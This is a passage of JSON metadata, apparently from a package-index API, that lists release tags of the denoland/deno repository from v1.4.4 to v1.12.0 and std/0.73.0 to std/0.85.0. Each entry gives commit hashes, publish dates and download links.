ull,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codel